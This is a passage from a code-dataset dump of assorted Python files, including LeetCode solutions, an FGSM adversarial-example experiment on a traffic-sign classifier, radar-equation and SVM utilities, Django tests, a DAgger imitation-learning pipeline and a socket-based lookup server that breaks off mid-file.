* +}\n ''')\n return phrase_freq(tags, parser, shape)\n","sub_path":"feature_extraction/linguistic/syntactic.py","file_name":"syntactic.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99688295","text":"from typing import List\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n count = 0\n for i in range(len(nums)):\n if (nums[i]!=0):\n nums[count] = nums[i]\n count+=1\n while(count< len(nums) ):\n nums[count]=0\n count+=1\n print(nums)\n\nsol = Solution()\narr = [0,1,0,3,12]\nsol.moveZeroes(arr)\n ","sub_path":"week-1/movezeros.py","file_name":"movezeros.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"30371331","text":"import numpy as np\nimport cv2\nfrom torch import nn\nimport torch\nfrom torch.autograd import Variable\nfrom stn_cnn import StnCnn\nfrom PIL import Image\nfrom argparse import ArgumentParser\nimport torchvision.utils\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\n\nlabels = ['i2', 'i4', 'i5', 'io', 'ip', 'p11', 'p23', 'p26', 'p5', 'pl30',\n 'pl40', 'pl5', 'pl50', 'pl60', 'pl80', 'pn', 'pne', 'po', 'w57']\n\n\ndef getindex(label):\n for i in range(len(labels)):\n if labels[i] == label:\n return i\n return 0\n\n\ndef imshow(img, title, save):\n npimg = img.cpu().numpy()\n fig = plt.figure(figsize=(5, 5))\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n \n if save:\n plt.axis('off')\n plt.savefig('../attack/' + title, bbox_inches='tight', pad_inches = 0)\n \n plt.title(title)\n plt.show()\n\n\ndef fgsm_targeted_attack(model, file_name, img_input, origin_label, target_label):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n imshow(torchvision.utils.make_grid(img_input, normalize=True), args.test_file, False)\n\n target_label_as_var = Variable(torch.from_numpy(np.asarray([target_label])))\n target_label_as_var = target_label_as_var.to(device)\n loss = nn.CrossEntropyLoss()\n img_input.requires_grad = True\n\n for i in range(1000):\n print('Iteration:', str(i))\n img_input.grad = None\n output = model(img_input)\n cost = loss(output, target_label_as_var)\n cost.backward()\n img_input.data = img_input.data - 0.3 * torch.sign(img_input.grad.data)\n\n attack_output = model(img_input)\n\n index = int(torch.argmax(attack_output))\n print('The prediction is: ' + labels[index])\n\n if int(torch.argmax(attack_output)) == target_label:\n targeted_name = file_name + \"_from_\" + labels[origin_label] + \"_to_\" + labels[target_label] + \".png\"\n imshow(torchvision.utils.make_grid(img_input, normalize=True).detach(), targeted_name, True)\n break\n \n return 1\n\n\ndef main(args):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model: StnCnn = StnCnn.load_from_checkpoint(args.checkpoint)\n model.to(device)\n model.eval()\n\n transform = transforms.Compose(\n [transforms.Resize((48, 48)),\n transforms.ToTensor(),\n transforms.Normalize((0.440985, 0.390349, 0.438721), (0.248148, 0.230837, 0.237781))])\n\n img = Image.open(args.test_file)\n img_rgb = transform(img.convert(\"RGB\"))\n img_input = img_rgb.view(1, 3, 48, 48).to(device)\n\n fgsm_targeted_attack(model, args.test_file.split(\"/\")[-1], img_input, getindex(args.original_label), getindex(args.targeted_label))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--checkpoint', type=str, required=False)\n 
parser.add_argument('--test_file', type=str, required=False)\n    parser.add_argument('--original_label', type=str, required=False)\n    parser.add_argument('--targeted_label', type=str, required=False)\n    args = parser.parse_args()\n    main(args)\n","sub_path":"traffic-sign-classification/3-attack/fgsm_cnn.py","file_name":"fgsm_cnn.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61392145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 25 23:35:52 2015\n\n@author: Alan\n\"\"\"\n\nimport shapefile as sf\nimport pandas as pd\nimport networkx as nx\n\ndistricts = sf.Reader('cb_2013_us_county_500k')\n\nshapes = districts.shapes()\nrecords = districts.records()\n\ndf = pd.DataFrame(records, columns = [districts.fields[i][0] for i in range(1, len(districts.fields))])\n\ng = nx.Graph()\ng.position = {}\ng.area = {}\n\nidnum = 4\n\nclass Bbox(object):\n    \n    def __init__(self, coords):\n        self.x1 = coords[0]\n        self.x2 = coords[2]\n        self.y1 = coords[1]\n        self.y2 = coords[3]\n        \n        self.p1 = (self.x1, self.y1)\n        self.p2 = (self.x2, self.y2)\n        \n    def middle(self):\n        return ((self.x1 + self.x2)/2, (self.y1 + self.y2)/2)\n    \n    def isin(self, b):\n        \n        def p_in(x,y):\n            x_in = (b.x1 < x < b.x2) or (b.x1 > x > b.x2)\n            y_in = (b.y1 < y < b.y2) or (b.y1 > y > b.y2)\n            return x_in and y_in\n        \n        return p_in(self.x1, self.y1) or p_in(self.x2, self.y2) or p_in(self.x1, self.y2) or p_in(self.x2, self.y1)\n\nfor i in range(len(records)):\n    district = records[i][idnum]\n    g.add_node(district)\n    bbox = Bbox(shapes[i].bbox)\n    g.position[district] = bbox.middle()\n    g.area[district] = sum(records[i][7:8])\n    \nfor i in range(len(records)):\n    district_i = records[i][idnum]\n    bbox_i = Bbox(shapes[i].bbox)\n    for j in range(len(records)):\n        district_j = records[j][idnum]\n        bbox_j = Bbox(shapes[j].bbox)\n        if i != j:\n            if bbox_j.isin(bbox_i):\n                g.add_edge(district_i, district_j)\n    \nG = next(nx.connected_component_subgraphs(g))\nareas = [g.area[v] for v in G]\nm = max(areas)\nnode_color = [float(g.degree(v)) for v in g]\nnode_size = [g.area[v]/m*1000+300 for v in g]\nnx.draw_networkx(g, pos=g.position, with_labels=False, node_color = node_color, node_size = node_size)","sub_path":"attempt3.py","file_name":"attempt3.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"602163923","text":"from __future__ import print_function\nfrom numpy import log10\nfrom numpy.testing import assert_almost_equal\n\n\ndef findPr(Z=None,K2=None,La=None,R=None,R1=None,Pt=None,b=None,Z1=None):\n    \"\"\"\n    solve stull radar eqn 8.23\n\n    Parameters\n    ----------\n\n    Z: float \n       Reflectivity (mm^6/m^3) \n    K2: float\n       Squared index of refraction (unitless) \n    La: float\n        one-way attenuation (unitless)\n    R: float\n        range to target (km)\n    R1: float\n        range factor, km, Stull 8.25\n    Pt: float\n        transmitted power, W, stull p. 246\n    b: float\n        equipment factor, Stull 8.26\n\n    Returns\n    -------\n\n    Pr: float\n        returned power (Watts)\n    \"\"\"    \n    Pr=Pt*b*K2/La**2.*(R1/R)**2.*Z\n    return Pr\n\ndef test_stull():\n    #coefficients for nexrad\n    R1=2.17e-10#range factor, km, Stull 8.25\n    Pt=750.e3 #transmitted power, W, stull p. 
246\n b=14255 #equipment factor, Stull 8.26\n Z=1.e4 #Z of 40 dbZ\n R=20 #range of 20 km\n K2=0.93 #liquid water\n La=1 #no attenuation\n nexrad=dict(R1=R1,Pt=Pt,b=b,Z=Z,R=R,K2=K2,La=La)\n #\n # pass a dictionary with keyword arguments to a function\n #\n power_watts=findPr(**nexrad)\n assert_almost_equal(power_watts,1.1705e-8,decimal=4)\n return power_watts\n \n\nif __name__==\"__main__\":\n #stull p. 246 sample appliation\n power_watts = test_stull()\n #\n # demonstrate how to print dictionary keys into a piece of text\n #\n the_text=\"\"\"\n Stull problem on p. 246: start with 40 dbZ at 20 km and\n find Pr:\n Here is the Pr: {Prval:10.5g} Watts\n Here is dbm -- decibels re 1 mWatt: {dBm:5.3f},\n \"\"\"\n values={'Prval':power_watts,'dBm':10*log10(power_watts*1.e3)}\n print(the_text.format_map(values))\n \n","sub_path":"a301examples/stull_radar.py","file_name":"stull_radar.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633094000","text":"from BASE import BASE \nfrom BASE import MultiOutputTransform\nfrom sklearn.svm import SVC\nimport numpy as np\n\nclass SVM(BASE):\n\n def __init__(self,X,y, C=[1.,1.], class_weight=None, kernel='rbf', **kwargs):\n BASE.__init__(self, X, y, **kwargs)\n self.type='classification'\n self.class_weight = class_weight\n self.kernel = kernel \n self.C_default = []\n if self.kernel=='linear':\n self.C_default=np.power(10.,np.arange(-6,12))\n else:\n for a in np.power(10.,np.arange(-3,4)):\n for gamma in np.power(10.,np.arange(-3,4)):\n self.C_default.append([a,gamma])\n self.C = C\n\n def fit(self, X, y, lock=None):\n \"\"\"\n \"\"\"\n\n X = np.vstack(X)\n y = np.vstack(y)\n y = MultiOutputTransform(self.enc, y)\n\n self.MO_clf = []\n\n if self.kernel=='linear':\n for y_ in y.T:\n clf = SVC(\n C=self.C,\n # gamma=self.C[1],\n verbose=self.verbose,\n max_iter = self.max_iter,\n kernel=self.kernel,\n class_weight=self.class_weight,\n )\n clf.fit(X, y_)\n self.MO_clf.append(clf)\n else:\n for y_ in y.T:\n clf = SVC(\n C=self.C[0],\n gamma=self.C[1],\n verbose=self.verbose,\n max_iter = self.max_iter,\n kernel=self.kernel,\n class_weight=self.class_weight,\n )\n clf.fit(X, y_)\n self.MO_clf.append(clf)\n\n return self\n","sub_path":"sewa/mula_learn/models/SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379796093","text":"from mjrl.algos.dagger import Dagger\nfrom torch.utils.data import DataLoader\nfrom visual_im.settings import *\nfrom visual_im.data_gen.transforms import *\nimport os\nfrom mjrl.utils.train_agent import train_agent\nimport argparse\nfrom mjrl.policies.gaussian_mlp import MLP\nfrom mjrl.baselines.mlp_baseline import MLPBaseline\nfrom mjrl.algos.npg_cg import NPG\nimport mjrl.envs\nfrom mjrl.utils.gym_env import GymEnv\nimport time as timer\nfrom mjrl.algos.behavior_cloning import BC\nfrom mjrl.policies.gaussian_cnn import CNN\nfrom torchvision import transforms\nimport glob\nimport json\nimport numpy as np\nfrom mjrl.samplers.base_sampler import do_rollout\nimport pickle\nfrom visual_im.data_gen.dataset import PathDataset, get_dataset_from_files\nfrom gym.envs.registration import register\n\nconfig = dict(\n# used got training expert policy\ndelta = 0.01,\ntraj_budget_expert = 12500,\n#traj_budget_expert = 10,\nnum_traj_expert= 50,\n# num_traj_expert= 2,\n\n# used for gen data\ntrain_traj_per_file= 
50,\n#train_traj_per_file= 1,\nnum_files_train= 1,\nval_traj_per_file = 5,\n#val_traj_per_file = 1,\nnum_files_val= 1,\n\n# used for BC\nbatch_size_viz_pol = 128,\n#batch_size_viz_pol = 64,\nbc_epoch = 20,\n#bc_epoch = 1,\nlr=0.0003,\n\n# used for DAgger\ndagger_epoch=10,\n#dagger_epoch=1,\nbeta_decay=0.9,\n# set the window to 0 for aggregation\nsliding_window=100,\ngen_traj_dagger_ep=50,\neval_num_traj=100,\ntrainer_epochs=5,\nuse_tactile=True,\nuse_late_fusion=True\n)\n\n\n\ndef train_expert_policy():\n config['expert_policy_folder'] = '%s_expert' % config['env_name']\n\n print('-' * 80)\n if os.path.exists(get_expert_policy_path(config['env_name'])):\n print('Expert policy already exists')\n return\n print('Training expert policy now')\n\n e = make_gym_env(ENV_ID[config['env_name']])\n policy = MLP(e.spec, hidden_sizes=(128, 128), seed=config['seed'])\n baseline = MLPBaseline(e.spec)\n agent = NPG(e, policy, baseline, seed=config['seed'], save_logs=True, normalized_step_size=config['delta'])\n\n job_name = os.path.join(config['main_dir'], config['expert_policy_folder'])\n ts = timer.time()\n train_agent(job_name=ensure_dir(job_name),\n agent=agent,\n seed=config['seed'],\n niter=int(config['traj_budget_expert'] / config['num_traj_expert']),\n gamma=0.99995,\n gae_lambda=0.97,\n num_cpu=10,\n sample_mode='trajectories',\n num_traj=config['num_traj_expert'],\n save_freq=5,\n evaluation_rollouts=10)\n print(\"time taken = %f\" % (timer.time() - ts))\n del(e)\n\ndef gen_data_from_expert():\n print('-' * 80)\n\n train_dir = os.path.join(config['main_dir'], 'train_data')\n val_dir = os.path.join(config['main_dir'], 'val_data')\n\n e = make_gym_env(config['env_id_il'])\n gen_data(e, train_dir, config['num_files_train'], config['train_traj_per_file'])\n gen_data(e, val_dir, config['num_files_val'], config['val_traj_per_file'])\n\n del(e)\n\n\ndef do_bc():\n config['viz_policy_folder_bc'] = 'bc_%s_viz_policy' % config['env_name']\n viz_policy_folder_bc = os.path.join(config['main_dir'], config['viz_policy_folder_bc'])\n\n print('-' * 80)\n if os.path.exists(viz_policy_folder_bc):\n print('BC: Viz policy already exists')\n return\n print('BC: Training viz policy now')\n\n ensure_dir(viz_policy_folder_bc)\n train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset = get_dataloaders_datasets()\n\n # policy = MLP(e.spec, hidden_sizes=(64,64), seed=SEED)\n e = make_gym_env(config['env_id_il'])\n robot_info_dim=None\n if config['has_robot_info']:\n robot_info_dim=e.env.env.robot_info_dim\n policy = CNN(action_dim=transformed_train_dataset.action_dim, use_seq=True, seed=config['seed'], robot_info_dim=robot_info_dim, action_stats=transformed_train_dataset.get_action_stats(), robot_info_stats=transformed_train_dataset.get_robot_info_stats(), use_late_fusion=config['use_late_fusion'])\n\n ts = timer.time()\n\n # TODO: add the list of full path to the pickles\n\n # SGD w/ momentum (using momentum = 0.9 AND Nesterov)\n # optimizer = torch.optim.SGD(policy.trainable_params, lr=args.lr, momentum=0.9, nesterov=True)\n # bc_algo = BC(dataloader, policy, args.id, epochs=args.ep, optimizer=optimizer, lr=args.lr)\n\n expert_policy = pickle.load(open(get_expert_policy_path(config['env_name']), 'rb'))\n # bc_algo = BC(train_dataloader=train_dataloader,\n # val_dataloader=val_dataloader,\n # expert_policy=expert_policy,\n # policy=policy,\n # log_dir=os.path.join(config['id'], 'bc'),\n # camera_name=CAMERA_NAME[config['env_name']],\n # epochs=config['bc_epoch'],\n # lr=config['lr'],\n 
bc_algo = Dagger(\n dagger_epochs=config['bc_epoch'],\n expert_policy=expert_policy,\n viz_policy=policy,\n old_data_loader=train_dataloader,\n val_data_loader=val_dataloader,\n log_dir=os.path.join(config['id'], 'bc'),\n pol_dir_name=viz_policy_folder_bc,\n save_epoch=1,\n beta_decay=1.0,\n env=e,\n num_traj_gen=config['gen_traj_dagger_ep'],\n camera_name=config['camera_name'],\n has_robot_info=config['has_robot_info'],\n seed=config['seed'] + (config['num_files_train'] * config['train_traj_per_file']),\n lr=config['lr'],\n trainer_epochs=config['trainer_epochs'],\n eval_num_traj=config['eval_num_traj'],\n sliding_window=config['sliding_window'],\n device_id=config['device_id'])\n\n bc_algo.train()\n print(\"time taken = %f\" % (timer.time() - ts))\n del (e)\n\n\ndef do_dagger():\n config['viz_policy_folder_dagger'] = 'dagger_%s_viz_policy' % config['env_name']\n viz_policy_folder_dagger = os.path.join(config['main_dir'], config['viz_policy_folder_dagger'])\n\n print('-' * 80)\n if os.path.exists(viz_policy_folder_dagger):\n print('DAgger: Viz policy already exists')\n return\n print('DAgger: Training viz policy now')\n\n ensure_dir(viz_policy_folder_dagger)\n train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset = get_dataloaders_datasets()\n\n # policy = MLP(e.spec, hidden_sizes=(64,64), seed=SEED)\n e = make_gym_env(config['env_id_il'])\n robot_info_dim = None\n if config['has_robot_info']:\n robot_info_dim = e.env.env.robot_info_dim\n policy = CNN(action_dim=transformed_train_dataset.action_dim, use_seq=True, robot_info_dim=robot_info_dim, action_stats=transformed_train_dataset.get_action_stats(), robot_info_stats=transformed_train_dataset.get_robot_info_stats(), use_late_fusion=config['use_late_fusion'])\n\n ts = timer.time()\n\n expert_policy = pickle.load(open(get_expert_policy_path(config['env_name']), 'rb'))\n dagger_algo = Dagger(\n dagger_epochs=config['dagger_epoch'],\n expert_policy=expert_policy,\n viz_policy=policy,\n old_data_loader=train_dataloader,\n val_data_loader=val_dataloader,\n log_dir=os.path.join(config['id'], 'dagger'),\n pol_dir_name=viz_policy_folder_dagger,\n save_epoch=1,\n beta_decay=config['beta_decay'],\n beta_start=config['beta_start'],\n env=e,\n lr=config['lr'],\n num_traj_gen=config['gen_traj_dagger_ep'],\n camera_name=config['camera_name'],\n has_robot_info = config['has_robot_info'],\n seed=config['seed'] + (config['num_files_train'] * config['train_traj_per_file']),\n trainer_epochs=config['trainer_epochs'],\n eval_num_traj=config['eval_num_traj'],\n sliding_window=config['sliding_window'],\n device_id=config['device_id'])\n\n dagger_algo.train()\n trained_policy = dagger_algo.viz_policy\n\n print(\"time taken = %f\" % (timer.time() - ts))\n del(e)\n\ndef main():\n parser = argparse.ArgumentParser(description='Running the whole pipeline got the given agent')\n parser.add_argument('-env', metavar='ENV', type=str,\n help='The env for which the experiment needs to be run')\n parser.add_argument('-seed', metavar='SEED', type=int,\n help='Seed', default=500)\n parser.add_argument('-id', metavar='ID', type=str,\n help='Id for this run', default='')\n parser.add_argument('-horizon', metavar='HORIZON', type=int,\n help='Horizon for the IL un-rollment', default=150)\n parser.add_argument('-betadecay', metavar='BETA', type=float,\n help='beta decay', default=0.9)\n parser.add_argument('-use_tactile', metavar='BOOL', type=str,\n help='use tactile or not, use True/False', default='True')\n parser.add_argument('-use_late_fusion', 
metavar='BOOL', type=str,\n help='use late fusion or not, use True/False', default='True')\n parser.add_argument('-ep', metavar='EPOCH', type=int,\n help='dagger epoch', default=10)\n parser.add_argument('-cam', metavar='CAM', type=str,\n help='camera view point', default='vil_camera')\n parser.add_argument('-device_id', metavar='DEV_ID', type=int,\n help='device id (cuda)', default=0)\n parser.add_argument('-init_traj', metavar='INIT_TRAJ', type=int,\n help='number of inital trajectories', default=50)\n parser.add_argument('-num_files', metavar='NUM_FILES', type=int,\n help='number of training', default=1)\n parser.add_argument('-epoch_traj', metavar='EPOCH_TRAJ', type=int,\n help='number of trajectories generated in one dagger epoch', default=50)\n parser.add_argument('-fit_ep', metavar='FIT_EP', type=int,\n help='number of fitting epochs', default=5)\n parser.add_argument('-window', metavar='WINDOW', type=int,\n help='size of sliding window', default=100)\n parser.add_argument('-eval_traj', metavar='EVAL_TRAJ', type=int,\n help='number of trajectories to evaluate on per epoch', default=100)\n parser.add_argument('-betastart', metavar='BETA', type=float,\n help='beta start', default=1.0)\n\n args = parser.parse_args()\n main_dir = os.path.join(DATA_DIR, '%s_%s' % (args.env, args.id))\n\n config['device_id'] = args.device_id\n config['env_name'] = args.env\n config['main_dir'] = main_dir\n config['id'] = '%s_id_%s' % (args.env, args.id)\n config['seed'] = args.seed\n config['env_id_il'] = \"il_%s\" % ENV_ID[config['env_name']]\n config['camera_name'] = args.cam\n\n # config stuff\n config['train_traj_per_file'] = args.init_traj // args.num_files\n config['num_files_train'] = args.num_files\n config['dagger_epoch'] = args.ep\n config['beta_decay'] = args.betadecay\n config['beta_start'] = args.betastart\n config['sliding_window'] = args.window\n config['gen_traj_dagger_ep'] = args.epoch_traj\n config['eval_num_traj'] = args.eval_traj\n config['trainer_epochs'] = args.fit_ep\n\n if args.use_tactile != 'False' and args.use_tactile != 'True':\n print('incorrect argument')\n exit(0)\n if args.use_late_fusion != 'False' and args.use_late_fusion != 'True':\n print('incorrect argument')\n exit(0)\n\n config['use_tactile'] = args.use_tactile == 'True'\n ts = timer.time()\n\n config['horizon_il'] = args.horizon\n config['use_late_fusion'] = args.use_late_fusion == 'True'\n register_env()\n\n train_expert_policy()\n print()\n gen_data_from_expert()\n print()\n # do_bc()\n # print()\n do_dagger()\n print()\n\n config_file = os.path.join(main_dir, 'config.json')\n\n with open(config_file, 'w') as fp:\n json.dump(config, fp)\n\n print('Done with all steps')\n print('total time taken = %f' % (timer.time() - ts))\n\ndef get_dataloaders_datasets():\n train_dir = os.path.join(config['main_dir'], 'train_data')\n val_dir = os.path.join(config['main_dir'], 'val_data')\n\n train_path_files = glob.glob(os.path.join(train_dir, '*'))\n val_path_files = glob.glob(os.path.join(val_dir, '*'))\n\n transforms_list = [ClipAction(), ToCudaTensor()]\n\n transformed_train_dataset = get_dataset_from_files(train_path_files, transform=transforms.Compose(transforms_list))\n transformed_val_dataset = get_dataset_from_files(val_path_files, transform=transforms.Compose(transforms_list))\n\n train_dataloader = DataLoader(transformed_train_dataset, batch_size=config['batch_size_viz_pol'], shuffle=True,\n num_workers=4)\n val_dataloader = DataLoader(transformed_val_dataset, batch_size=config['batch_size_viz_pol'], shuffle=True,\n 
num_workers=4)\n return train_dataloader, val_dataloader, transformed_train_dataset, transformed_val_dataset\n\ndef gen_data(env, data_dir, num_files, trajs_per_file):\n if os.path.exists(data_dir):\n print('%s folder already exists' % os.path.basename(data_dir))\n return\n\n ensure_dir(data_dir)\n print('Generating %s' % os.path.basename(data_dir))\n expert_policy_path = get_expert_policy_path(config['env_name'])\n expert_policy = pickle.load(open(expert_policy_path, 'rb'))\n\n\n for i in range(num_files):\n seed = config['seed'] + i * trajs_per_file\n paths = np.array(do_rollout(N=trajs_per_file, policy=expert_policy, env=env, pegasus_seed=seed, use_mean=True, save_img=True, camera_name=config['camera_name'], device_id=config['device_id']))\n train_file = os.path.join(data_dir,'train_paths_%s_batch_%d.pickle' % (config['env_name'], i))\n pickle.dump(paths, open(train_file, 'wb'))\n\ndef make_gym_env(id):\n e = GymEnv(id, use_tactile=config['use_tactile'])\n config['has_robot_info'] = e.has_robot_info_attr()\n config['env_spec'] = e.spec.as_dict()\n return e\n\ndef ensure_dir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n return directory\n\ndef get_expert_policy_path(env_name):\n exp_p_p = os.path.join(EXPERT_POLICIES_DIR, EXPERT_POLICIES[env_name])\n print('Using: %s' % exp_p_p)\n return exp_p_p\n\ndef register_env():\n register(\n id=config['env_id_il'],\n entry_point=ENTRY_POINT[config['env_name']],\n max_episode_steps=config['horizon_il'],\n )\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"visual_im/run_exp.py","file_name":"run_exp.py","file_ext":"py","file_size_in_byte":14425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"642790535","text":"from django.test import TestCase, tag\nfrom django.contrib.auth import get_user_model\n\nfrom voting_app.models import Poll, Choice\n\n\nUser = get_user_model()\n\nTEST_USER = {\n 'username': 'konni',\n 'email': 'test@test.com',\n 'password': 'q,1234',\n}\n\nTEST_POLL = {\n 'description': 'What fruit below do you like most?',\n}\n\n\nTEST_CHOICES = [\n {\n 'text': 'apple',\n 'total': 3,\n },\n {\n 'text': 'pear',\n 'total': 5,\n },\n {\n 'text': 'watermelon',\n 'total': 10,\n },\n]\n\n\ndef create_or_get_user(data=None):\n if User.objects.count() == 0:\n if not data:\n data = TEST_USER\n\n user = User.objects.create_user(**data)\n return user\n\n return User.objects.first()\n\n\ndef create_a_poll():\n poll = Poll()\n for key, value in TEST_POLL.items():\n setattr(poll, key, value)\n\n user = create_or_get_user()\n poll.author = user\n poll.save()\n return poll\n\n\nclass PollModelTest(TestCase):\n\n def test_create_and_retrieve_poll(self):\n poll = Poll()\n for key, value in TEST_POLL.items():\n setattr(poll, key, value)\n\n user = create_or_get_user()\n poll.author = user\n poll.save()\n\n self.assertEqual(Poll.objects.count(), 1)\n\n poll = Poll.objects.first()\n for key, value in TEST_POLL.items():\n self.assertEqual(getattr(poll, key), value)\n\n def test_valid_poll_should_has_more_than_one_choice(self):\n poll = create_a_poll()\n self.assertEqual(Poll.valid_polls().count(), 0)\n\n for i in range(3):\n choice = Choice.objects.create(text='test choice', poll=poll)\n\n self.assertEqual(Poll.valid_polls().count(), 1)\n\n def test_polls_should_in_reverse_modified_order(self):\n poll_1 = create_a_poll()\n poll_2 = create_a_poll()\n\n polls = Poll.objects.all()\n\n self.assertEqual(poll_2, polls[0])\n self.assertEqual(poll_1, polls[1])\n\n\nclass 
ChoiceModelTest(TestCase):\n\n def test_create_and_retrieve_choice(self):\n poll = create_a_poll()\n choice = Choice()\n for key, value in TEST_CHOICES[0].items():\n setattr(choice, key, value)\n choice.poll = poll\n choice.save()\n\n self.assertEqual(Choice.objects.count(), 1)\n\n choice = Choice.objects.first()\n for key, value in TEST_CHOICES[0].items():\n self.assertEqual(getattr(choice, key), value)\n\n def test_default_total_is_zero(self):\n poll = create_a_poll()\n Choice.objects.create(text='test choice', poll=poll)\n choice = Choice.objects.get(text='test choice')\n\n self.assertEqual(choice.total, 0)\n\n def test_add_choices_to_poll(self):\n poll = create_a_poll()\n for choice_data in TEST_CHOICES:\n choice = Choice()\n\n for key, value in choice_data.items():\n setattr(choice, key, value)\n\n choice.poll = poll\n choice.save()\n\n self.assertEqual(poll.choice_set.count(), 3)\n","sub_path":"voting_app/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148089937","text":"'''\r\n@author: Karun Kanda (kk951)\r\n@author: Shila Basu (sb1825)\r\n'''\r\n\r\nimport select, socket, sys, time\r\n\r\nHOST = '' # Standard loopback interface address (localhost)\r\nPORT = int(sys.argv[1]) # Port to listen on (non-privileged ports are > 1023)\r\nTS1_HOST = sys.argv[2] # TS1 hostname\r\nTS1_PORT = int(sys.argv[3]) # TS1 port number\r\nTS2_HOST = sys.argv[4] # TS2 hostname\r\nTS2_PORT = int(sys.argv[5]) # TS2 port number\r\nTS_TIMEOUT = 5 # time out for both the TS servers\r\nt_start = -1 # start time for getting the response\r\n\r\n'''\r\nClientRequest class\r\n\r\nDescription: A class to store the client requests and help enable to send a response within a certain amount of time.\r\nThen give the response back via the LS server socket.\r\n'''\r\nclass ClientRequest:\r\n time_start = -1\r\n response = ''\r\n def __init__(self,time,resp):\r\n self.time_start = time\r\n self.response = resp\r\n def __str__(self):\r\n return \"Start Time: \" + str(self.time_start) + \" Response: \" + str(self.response)\r\n\r\n'''\r\nMsgQueue class\r\n\r\nDescription: A class to store the messages the LS server recieves from the TS servers to send back later to the \r\nclient.\r\n'''\r\nclass MsgQueue:\r\n\r\n def __init__(self):\r\n self.queue_list = []\r\n\r\n def put(self, entry):\r\n self.queue_list.insert(0,entry)\r\n\r\n def get(self):\r\n return self.queue_list.pop()\r\n\r\n def empty(self):\r\n return len(self.queue_list) == 0\r\n\r\n def clear(self):\r\n self.queue_list = []\r\n\r\n'''\r\nls_server takes in no arguments and holds the main logic behind the LS server. Upon starting the main logic of the LS server it creates the LS server socket and \r\nthe two client sockets to connect to the TS servers. Something new about these connections are they are set with timeouts because we don't want to over work the \r\nconnection between the client and the server. \r\n\r\nThe purpose of this method is to get the requested response from the TS servers according to who has the information the client needs. The LS server gets the requested\r\nhostname from the client and sends it to the TS_1 server and TS_2 server. 
Then according to the timeout whoever has the information that information from the recv call \r\nis stored into a reply type variable which is sent back in the form:\r\nHostname IP Address A\r\nThen if there is no response from either TS_1 or TS_2 the LS server sends back:\r\nERROR:Host Not Found\r\nRight at the end of the requesting process.\r\n'''\r\ndef ls_server():\r\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server.setblocking(0)\r\n server.bind((HOST, PORT))\r\n server.listen(1)\r\n\r\n ts1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n ts1.settimeout(TS_TIMEOUT)\r\n ts1.connect((TS1_HOST, TS1_PORT))\r\n\r\n ts2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n ts2.settimeout(TS_TIMEOUT)\r\n ts2.connect((TS2_HOST, TS2_PORT))\r\n\r\n client = None\r\n inputs = [server,ts1,ts2] #List sockets to wait for\r\n outputs = []\r\n msg_queues = {}\r\n msg_queues[ts1] = MsgQueue()\r\n msg_queues[ts2] = MsgQueue()\r\n\r\n ip_requests = {}\r\n\r\n while inputs:\r\n readable, writable, exceptional = select.select(\r\n inputs, outputs, [],TS_TIMEOUT)\r\n\r\n for s in readable:\r\n if s is server:\r\n #Connect to client\r\n client, client_address = s.accept()\r\n client.setblocking(0)\r\n inputs.append(client) #Add input for client msgs\r\n msg_queues[client] = MsgQueue()\r\n print(\"Established Connection:\",client_address)\r\n else:\r\n #Read incoming data\r\n print()\r\n print(\"Receiving Message.....\")\r\n data = s.recv(1024)\r\n\r\n if data:\r\n if s is client:\r\n #Request for ip has been sent from client\r\n #Set ts1 and ts2 sockets for writing\r\n outputs.append(ts1)\r\n outputs.append(ts2)\r\n\r\n #Add messages to queue\r\n msg_queues[ts1].put(data)\r\n msg_queues[ts2].put(data)\r\n\r\n #Add to request list to keep track of timeouts\r\n t_start = time.time()\r\n ip_requests[data] = ClientRequest(t_start,b'')\r\n\r\n print(\"Client IP Request:\", data, ip_requests[data])\r\n\r\n # Set client socket to keep checking for fulfilled request\r\n outputs.append(client)\r\n msg_queues[client].put(data)\r\n else:\r\n #TS1 or TS2 has sent a reply\r\n #Parse the data find the domain name\r\n data_str = data.decode(\"UTF-8\").strip()\r\n b_domain_str = data_str.split()[0].encode('utf-8')\r\n t_start = ip_requests[b_domain_str].time_start\r\n\r\n #update ip_requests to show that it has been fulfilled\r\n ip_requests[b_domain_str] = ClientRequest(t_start, data)\r\n print(\"IP Request Fulfilled:\",b_domain_str,ip_requests[b_domain_str])\r\n else:\r\n # No data from socket means no connection\r\n # Clean up and close the connection\r\n print(\"CONNECTION LOST\")\r\n if s in outputs:\r\n outputs.remove(s)\r\n inputs.remove(s)\r\n s.close()\r\n msg_queues[s].clear()\r\n\r\n #print(ip_requests)\r\n\r\n for s in writable:\r\n #send data for every socket in writable\r\n if (not msg_queues[s].empty()):\r\n next_msg = msg_queues[s].get()\r\n if s is client:\r\n cr 